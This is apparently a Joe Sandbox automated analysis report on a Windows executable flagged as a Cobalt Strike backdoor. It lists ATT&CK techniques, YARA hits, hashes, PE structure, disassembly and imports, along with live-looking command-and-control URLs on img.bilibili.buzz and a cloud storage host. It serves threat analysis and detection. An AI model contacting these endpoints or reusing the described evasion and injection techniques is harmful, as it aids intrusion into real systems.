      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000003.1770728678.000001DDE5E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SO2mdwWVvg.exe PID: 7516, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter
      1
      DLL Side-Loading
      1
      Process Injection
      1
      Disable or Modify Tools
      OS Credential Dumping1
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Abuse Elevation Control Mechanism
      11
      Virtualization/Sandbox Evasion
      LSASS Memory11
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Process Injection
      Security Account Manager1
      Account Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Abuse Elevation Control Mechanism
      NTDS1
      System Owner/User Discovery
      Distributed Component Object ModelInput Capture12
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      SO2mdwWVvg.exe37%ReversingLabsWin64.Backdoor.Cobeacon
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      sgp.file.myqcloud.com
      43.152.64.207
      truefalse
        unknown
        img.bilibili.buzz
        unknown
        unknowntrue
          unknown
          18.31.95.13.in-addr.arpa
          unknown
          unknowntrue
            unknown
            intl-web-1305970982.cos.ap-singapore.myqcloud.com
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              img.bilibili.buzztrue
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://img.bilibili.buzz:2096/wSO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://code.jquery.com/SO2mdwWVvg.exe, 00000000.00000003.1771402299.000001DDE5EB0000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://img.bilibili.buzz:2096/m32SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://img.bilibili.buzz:2096/mSO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/index.jpgSO2mdwWVvg.exefalse
                          unknown
                          https://img.bilibili.buzz/iSO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://img.bilibili.buzz:2096/CriSO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5E9A000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://img.bilibili.buzz:2096/3r9SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5E9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://img.bilibili.buzz:2096/jquery-3.3.1.min.js011b87bd06T-SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://img.bilibili.buzz:2096/jquery-3.3.1.min.js1ASO2mdwWVvg.exe, 00000000.00000002.3567085298.000001DDE5F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://img.bilibili.buzz/SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://img.bilibili.buzz:2096/jquery-3.3.1.min.js9SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsySO2mdwWVvg.exe, 00000000.00000002.3567085298.000001DDE5F86000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://img.bilibili.buzz:2096/jquery-3.3.1.min.js=SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/index.jpgvRSO2mdwWVvg.exe, 00000000.00000003.1770340224.000001DDE5E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://img.bilibili.buzz:2096/jquery-3.3.1.min.js/SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsuSO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://img.bilibili.buzz:2096/JSO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsISO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/index.jpg(SSO2mdwWVvg.exe, 00000000.00000003.1770340224.000001DDE5E9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsMSO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsSO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsraphySO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://img.bilibili.buzz:2096/SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5E9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                43.152.64.207
                                                                sgp.file.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1535738
                                                                Start date and time:2024-10-17 09:19:14 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 50s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Run with higher sleep bypass
                                                                Number of analysed new started processes analysed:22
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:SO2mdwWVvg.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:f3b2f1ec49bf6fbd4fe9e28fb28e526da4c7fce85ac95f835d3dc343b872075d.exe
                                                                Detection:MAL
                                                                Classification:mal84.troj.evad.winEXE@2/0@8/1
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: SO2mdwWVvg.exe
                                                                No simulations
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                43.152.64.207O6O7O5REot.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • /Shorts/1index.jpg
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                sgp.file.myqcloud.comO6O7O5REot.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 43.152.64.207
                                                                O6O7O5REot.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 43.152.64.193
                                                                LisectAVT_2403002B_132.exeGet hashmaliciousUnknownBrowse
                                                                • 43.152.64.193
                                                                LisectAVT_2403002B_132.exeGet hashmaliciousUnknownBrowse
                                                                • 43.152.64.207
                                                                LisectAVT_2403002B_185.exeGet hashmaliciousUnknownBrowse
                                                                • 43.153.232.152
                                                                LisectAVT_2403002B_185.exeGet hashmaliciousUnknownBrowse
                                                                • 43.153.232.152
                                                                LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                                                • 43.152.64.207
                                                                LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                                                • 43.153.232.151
                                                                LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                                                • 43.152.64.207
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                LILLY-ASUSmpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 43.9.28.141
                                                                O6O7O5REot.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 43.152.64.207
                                                                m68k.elfGet hashmaliciousMiraiBrowse
                                                                • 43.110.37.159
                                                                O6O7O5REot.exeGet hashmaliciousCobaltStrikeBrowse
                                                                • 43.152.64.193
                                                                1kqLF3lHvm.elfGet hashmaliciousMiraiBrowse
                                                                • 40.245.243.144
                                                                JFX7sO1HHj.elfGet hashmaliciousMiraiBrowse
                                                                • 43.2.146.57
                                                                JJLOVjVrYv.elfGet hashmaliciousMirai, GafgytBrowse
                                                                • 43.223.172.145
                                                                VysS7K9PPz.elfGet hashmaliciousMiraiBrowse
                                                                • 43.87.11.124
                                                                VDRitLeYgi.elfGet hashmaliciousMirai, GafgytBrowse
                                                                • 42.132.41.46
                                                                No context
                                                                No context
                                                                No created / dropped files found
                                                                File type:PE32+ executable (console) x86-64, for MS Windows
                                                                Entropy (8bit):6.39827836007752
                                                                TrID:
                                                                • Win64 Executable Console (202006/5) 92.65%
                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:SO2mdwWVvg.exe
                                                                File size:8'063'016 bytes
                                                                MD5:bfa844f0be57643e3ebf11690e539a75
                                                                SHA1:8495fd0110b642c66f49e3d30c543f5c730bc206
                                                                SHA256:f3b2f1ec49bf6fbd4fe9e28fb28e526da4c7fce85ac95f835d3dc343b872075d
                                                                SHA512:c527259c31068ce4bcba4f88bd8f99745d43c4809b8c75f6242eccfa712bf2fcbf3e785294c94f65ee23397d44dda74b1ec02cc9b9a76e059b608d31c11c8317
                                                                SSDEEP:49152:u/byhpYcDbYtlxFbY2zU6AoF01ms886E4xkkrtCMcrY0Eqh88RwTAJx6ZXdl71KB:eyoaZl3sqbwEJOfcOm4ZW
                                                                TLSH:8F869D13E9946AF4D4ABCA34812F63317B317A9DD7108BB30A75C3716F52291EF0BA58
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g..z..U....&....&..)...P................@..............................{....../....`... ............................
                                                                Icon Hash:0000000000000000
                                                                Entrypoint:0x1400014d0
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x140000000
                                                                Subsystem:windows cui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x6708D41F [Fri Oct 11 07:30:39 2024 UTC]
                                                                TLS Callbacks:0x40254570, 0x1, 0x4029eff0, 0x1, 0x4029efc0, 0x1
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:68496f0ecf5dcf9ad868bebe595b3bbb
                                                                Signature Valid:false
                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 19/10/2023 20:51:56 16/10/2024 20:51:56
                                                                Subject Chain
                                                                • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                Version:3
                                                                Thumbprint MD5:87AC6386A8291ECF334EB3022D315F82
                                                                Thumbprint SHA-1:05A822642CF64464460CB4684FF11C7F476873CA
                                                                Thumbprint SHA-256:36305D4DDFD4756D17FCDFB742FD2031A3D5133BCE34BD8E3080BC803AE44D0B
                                                                Serial:33000003A54111E8F07FBE0B750000000003A5
                                                                Instruction
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [00397365h]
                                                                mov dword ptr [eax], 00000000h
                                                                call 00007F500C7EB7DFh
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop dword ptr [eax]
                                                                dec eax
                                                                sub esp, 28h
                                                                call 00007F500CA894E4h
                                                                dec eax
                                                                test eax, eax
                                                                sete al
                                                                movzx eax, al
                                                                neg eax
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                push esi
                                                                push edi
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov esi, dword ptr [ecx]
                                                                dec eax
                                                                test esi, esi
                                                                je 00007F500C7EBB8Dh
                                                                dec eax
                                                                mov ecx, esi
                                                                call 00007F500C99370Fh
                                                                dec eax
                                                                mov eax, dword ptr [esi+10h]
                                                                dec eax
                                                                dec dword ptr [eax]
                                                                jne 00007F500C7EBB4Bh
                                                                dec eax
                                                                lea ecx, dword ptr [esi+10h]
                                                                call 00007F500C7ECDACh
                                                                dec eax
                                                                cmp dword ptr [esi+18h], 00000000h
                                                                je 00007F500C7EBB52h
                                                                dec eax
                                                                mov eax, dword ptr [esi+40h]
                                                                dec eax
                                                                test eax, eax
                                                                je 00007F500C7EBB49h
                                                                dec eax
                                                                mov ecx, dword ptr [esi+48h]
                                                                call dword ptr [eax+18h]
                                                                mov edx, 00000070h
                                                                inc ecx
                                                                mov eax, 00000008h
                                                                dec eax
                                                                mov ecx, esi
                                                                dec eax
                                                                add esp, 28h
                                                                pop edi
                                                                pop esi
                                                                jmp 00007F500C7F0EACh
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                pop edi
                                                                pop esi
                                                                ret
                                                                dec eax
                                                                mov edi, eax
                                                                jmp 00007F500C7EBB74h
                                                                dec eax
                                                                mov edi, eax
                                                                jmp 00007F500C7EBB58h
                                                                dec eax
                                                                mov edi, eax
                                                                dec eax
                                                                mov eax, dword ptr [esi+10h]
                                                                dec eax
                                                                dec dword ptr [eax]
                                                                jne 00007F500C7EBB4Bh
                                                                dec eax
                                                                lea ecx, dword ptr [esi+10h]
                                                                call 00007F500C7ECD54h
                                                                dec eax
                                                                cmp dword ptr [esi+18h], 00000000h
                                                                je 00007F500C7EBB52h
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3ed0000x29a4.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3f20000x4a0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3990000x14898.pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x7ae0000x2828/113
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3f30000x6ae0.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x3984800x28.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x3ed9480x858.idata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x29f0a80x29f200259b974f0ee51784bf597efc48bbbbbeunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .data0x2a10000x4b200x4c00abdfe15562c55b90f2caf4c50a108ef8False0.19413034539473684data3.042317915133944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata0x2a60000xf29400xf2a00790c81429cc4502e5f79bf85173aa8bbFalse0.394058314013395148086 relocatable (Microsoft), "\001", 1st record data length 46, 2nd record type 0x72, 2nd record data length 285305.804525344969575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .pdata0x3990000x148980x14a0035892e9354d3515e9ba22c5b66ff4452False0.5371803977272728data6.285541568397713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .xdata0x3ae0000x3d1f80x3d2005596f7921b7cbb1e5f7896c46d3fd1faFalse0.3804999041411043data5.482057773775184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .bss0x3ec0000x35c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata0x3ed0000x29a40x2a0027e40ce0f006a359416d45289b69f5baFalse0.26209077380952384data4.4450782274129645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .CRT0x3f00000x700x200eccf70b44811bcc4f44c36459f577362False0.08984375data0.4965832874032078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .tls0x3f10000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x3f20000x4a00x600f106952f55bc10f0d669c8c5041ac8e9False0.3131510416666667data3.7177162859354107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x3f30000x6ae00x6c00a005c052707dc9389c58deea863a8fd8False0.3851634837962963data5.448662938188895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /40x3fa0000x2600x4008517538435369095b38cab16045a1774False0.189453125data1.666147721952265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /190x3fb0000x9b4d60x9b6005ad3a155317bf826b2f573486a2a6b6dFalse0.12735694891391794MIPSEB Ucode5.0979263844548415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /350x4970000xe26090xe2800ce446b3f6eb446b7db86fce6ead5e19fFalse0.3802579159768212data5.526268967684696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /470x57a0000x13f10x1400937541e4121ed480a0a0fa607719bf64False0.2408203125data4.899277134046503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /610x57c0000x5b4040x5b6009d0f11493c72314e3e042d7b0897aa00False0.3966339988030096data5.962573754446139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /730x5d80000x2e00x40085316995ff793b87845b81d67872b184False0.3447265625data2.880882175766859IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /860x5d90000x15106b0x151200deef478bf5fb15e418fc3e2de1d539cfFalse0.17364852729885058data5.384084445449517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /970x72b0000x10e0x2005c08cacbdf4071bce793c7c0e033b7a4False0.244140625data1.6221371847887087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /1130x72c0000x8eab00x8ec00b62a07db96f4a7c8651b2eb44ed6f7a8False0.10461532672942207data2.4961799056096816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /1270x7bb0000x3e90x40055ab218550afaef32cf682ad9b627bb9False0.5302734375data4.566407064601656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                /1430x7bc0000x170x200b2332f3b7c1b892bb88709de3af56034False0.064453125Spectrum .TAP data "\005 " - BASIC program0.2475781363955928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x3f20e80x30Device independent bitmap graphic, 1 x 2 x 24, image size 0, resolution 96 x 96 px/mEnglishUnited States0.6041666666666666
                                                                RT_GROUP_ICON0x3f21180x14dataEnglishUnited States1.05
                                                                RT_VERSION0x3f212c0x374dataEnglishUnited States0.4095022624434389
                                                                DLLImport
                                                                KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, InitializeCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwindEx, VirtualProtect, VirtualQuery, __C_specific_handler
                                                                msvcrt.dll__getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _fmode, _fpreset, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcmp, memcpy, memmove, memset, signal, strlen, strncmp, vfprintf
                                                                advapi32.dllCryptAcquireContextW, CryptDestroyKey, CryptImportKey, CryptReleaseContext, OpenProcessToken, RegCloseKey, RegEnumKeyExW, RegEnumValueW, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, SystemFunction036
                                                                bcrypt.dllBCryptGenRandom
                                                                crypt32.dllCertAddCertificateContextToStore, CertAddEncodedCTLToStore, CertAddEncodedCertificateToStore, CertCloseStore, CertCreateCTLEntryFromCertificateContextProperties, CertCreateCertificateContext, CertDeleteCertificateFromStore, CertDuplicateCertificateChain, CertDuplicateCertificateContext, CertDuplicateStore, CertEnumCertificatesInStore, CertFreeCTLContext, CertFreeCertificateChain, CertFreeCertificateContext, CertGetCertificateChain, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertOpenStore, CertSetCertificateContextProperty, CertVerifyCertificateChainPolicy, CertVerifyTimeValidity, CryptAcquireCertificatePrivateKey, CryptBinaryToStringA, CryptDecodeObjectEx, CryptEncodeObjectEx, CryptHashCertificate, CryptMsgEncodeAndSignCTL, CryptStringToBinaryA, PFXExportCertStore, PFXImportCertStore
                                                                kernel32.dllAcquireSRWLockExclusive, AcquireSRWLockShared, AddVectoredExceptionHandler, CancelIo, CancelIoEx, CloseHandle, CompareStringOrdinal, ConnectNamedPipe, CopyFileExW, CreateDirectoryW, CreateEventW, CreateFileMappingA, CreateFileW, CreateHardLinkW, CreateIoCompletionPort, CreateNamedPipeW, CreateProcessW, CreateSymbolicLinkW, CreateThread, CreateToolhelp32Snapshot, CreateWaitableTimerExW, DeleteFileW, DeleteProcThreadAttributeList, DeviceIoControl, DisconnectNamedPipe, DuplicateHandle, ExitProcess, FileTimeToSystemTime, FindClose, FindFirstFileW, FindNextFileW, FlushFileBuffers, FormatMessageW, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetCommandLineW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetEnvironmentStringsW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNamedPipeInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetProcessId, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetWindowsDirectoryW, HeapAlloc, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, InitializeProcThreadAttributeList, LoadLibraryExW, LocalFree, MapViewOfFile, Module32FirstW, Module32NextW, MoveFileExW, MultiByteToWideChar, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleW, ReadFile, ReadFileEx, ReleaseSRWLockExclusive, ReleaseSRWLockShared, RemoveDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetCurrentDirectoryW, SetEnvironmentVariableW, SetFileAttributesW, SetFileCompletionNotificationModes, SetFileInformationByHandle, SetFilePointerEx, SetFileTime, SetHandleInformation, SetLastError, SetThreadErrorMode, SetThreadStackGuarantee, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SleepConditionVariableSRW, SleepEx, SwitchToThread, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnmapViewOfFile, UpdateProcThreadAttribute, WaitForMultipleObjects, WaitForSingleObject, WakeAllConditionVariable, 